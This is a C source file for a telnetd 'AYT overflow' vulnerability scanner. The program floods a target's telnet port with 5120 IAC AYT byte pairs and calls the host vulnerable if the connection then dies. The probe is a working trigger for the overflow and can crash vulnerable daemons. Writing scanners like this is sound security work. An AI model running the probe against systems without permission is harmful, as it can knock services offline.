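/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 * Bug found by scut of TESO Security
 *
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW: http://www.secpoint.com
 * Email: info@secpoint.com
 *
 * This program checks for the AYT overflow related to the
 * newly discovered telnetd vulnerabilities.
 *
 * Tested against:
 *   Vulnerable:
 *     netkit-telnet-0.10
 *     FreeBSD 4.2
 *   Not vulnerable:
 *     netkit-telnet-0.17
 *
 * Please keep us updated with the os's that you check, and
 * report back to us on info@secpoint.com, whether the system
 * is vulnerable or not. So we can construct a full list
 * of vulnerable systems.
 *
 *
 * This source code is for educational purpose ONLY,
 * Security Point(R) will not be responsible for any damages
 * whatsoever that have a connection with this code. There are
 * no warranties with regard to this information.
 *
 * Are your networks under attack at this moment?
 *
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 *
 * Please see http://www.secpoint.com/solutions.php
 *
 */

#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

enum {
    TELNET_IAC = 255,       /* 0xff, "interpret as command" */
    TELNET_AYT = 246,       /* 0xf6, "are you there" */
    TELNET_PORT = 23,
    AYT_PAIRS = 5120,       /* number of IAC AYT pairs in the probe */
    IO_TIMEOUT_SECS = 60    /* same limit the original alarm() calls used */
};

/* Probe bytes and receive scratch space; both keep the original 5120*2 size. */
static unsigned char sendbuffer[AYT_PAIRS * 2];
static char buffer[AYT_PAIRS * 2];

/*
 * Fill dst with as many complete IAC AYT pairs as fit into cap bytes and
 * return the number of bytes written.
 *
 * The original built the probe with sprintf(sendbuffer, "%s%c%c", sendbuffer,
 * ...), which passes the destination as a source argument (undefined
 * behaviour), rescans the string on every pass, and writes a terminating NUL
 * one byte past the end of the array. Writing the bytes directly and carrying
 * an explicit length avoids all three and needs no terminator.
 */
static size_t fill_ayt_probe(unsigned char *dst, size_t cap)
{
    size_t used = 0;

    while (cap - used >= 2) {
        dst[used++] = TELNET_IAC;
        dst[used++] = TELNET_AYT;
    }
    return used;
}

/*
 * Wait until fd has data to read or seconds have elapsed.
 * Returns a positive value when readable, 0 on timeout, -1 on error.
 *
 * This replaces the original signal(SIGALRM)/alarm() pair: whether an alarm
 * interrupts a blocked read() depends on how the platform's signal() installs
 * the handler, and the handler's timeout flag was never consulted.
 */
static int wait_readable(int fd, int seconds)
{
    fd_set readable;
    struct timeval limit;

    if (fd < 0 || fd >= FD_SETSIZE) {
        return -1;
    }
    FD_ZERO(&readable);
    FD_SET(fd, &readable);
    limit.tv_sec = seconds;
    limit.tv_usec = 0;
    return select(fd + 1, &readable, NULL, NULL, &limit);
}

/*
 * Connect to the telnet port of the host named in argv[1], send the AYT
 * probe and report whether the connection still answers afterwards.
 *
 * The verdict is a heuristic: "vulnerable" only means the connection stopped
 * delivering data after the probe. A connection that is dropped for an
 * unrelated reason produces the same verdict, so confirm any finding against
 * the installed telnetd version before acting on it.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in address;
    struct hostent *host;
    size_t probe_len;
    ssize_t got;
    ssize_t sent;
    int sock;
    int ready;

    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc != 2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);

    host = gethostbyname(argv[1]);
    if (host == NULL) {
        /* gethostbyname() reports through h_errno, not errno, so perror()
         * would print an unrelated message. The original also called exit(0)
         * here, which reported success for a failed lookup. */
        fprintf(stderr, "gethostbyname: cannot resolve %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }
    /* Never copy more than sin_addr can hold. */
    if (host->h_addrtype != AF_INET ||
        host->h_length != (int)sizeof(address.sin_addr)) {
        fprintf(stderr, "gethostbyname: no IPv4 address for %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&address, 0, sizeof(address));
    memcpy(&address.sin_addr, host->h_addr_list[0], sizeof(address.sin_addr));
    address.sin_family = AF_INET;
    address.sin_port = htons(TELNET_PORT);

    if (connect(sock, (struct sockaddr *)&address, sizeof(address)) < 0) {
        perror("connect");
        close(sock);
        exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n");
    printf("Sending telnet options... stand by...\n");

    probe_len = fill_ayt_probe(sendbuffer, sizeof(sendbuffer));

    /* Consume the server's opening data. If the peer has already gone away,
     * the later read would fail for a reason unrelated to the probe and be
     * misreported as "vulnerable", so stop here instead. */
    ready = wait_readable(sock, IO_TIMEOUT_SECS);
    if (ready < 0) {
        perror("select");
        close(sock);
        exit(EXIT_FAILURE);
    }
    if (ready > 0) {
        got = read(sock, buffer, sizeof(buffer));
        if (got <= 0) {
            fprintf(stderr,
                    "Connection to %s ended before the probe was sent; "
                    "result inconclusive\n", argv[1]);
            close(sock);
            exit(EXIT_FAILURE);
        }
    }
    /* ready == 0: no opening data within the limit; continue as the
     * original did once its first alarm expired. */

    sent = write(sock, sendbuffer, probe_len);
    if (sent < 0) {
        /* Keep going: the read below still decides the verdict, as before. */
        perror("write");
    } else if ((size_t)sent < probe_len) {
        fprintf(stderr, "warning: only %zd of %zu probe bytes were sent\n",
                sent, probe_len);
    }

    memset(buffer, 0, sizeof(buffer));
    ready = wait_readable(sock, IO_TIMEOUT_SECS);
    if (ready < 0) {
        perror("select");
        close(sock);
        exit(EXIT_FAILURE);
    }
    if (ready == 0) {
        /* Silence alone does not show that the daemon went away, so it is
         * reported separately rather than as a finding. */
        printf("No reply from %s within %d seconds; result inconclusive\n",
               argv[1], (int)IO_TIMEOUT_SECS);
        close(sock);
        exit(EXIT_FAILURE);
    }

    got = read(sock, buffer, sizeof(buffer));
    close(sock);
    if (got <= 0) {
        printf("Telnetd on %s vulnerable\n", argv[1]);
        exit(EXIT_SUCCESS);
    }
    printf("Telnetd on %s not vulnerable\n", argv[1]);
    exit(EXIT_SUCCESS);
}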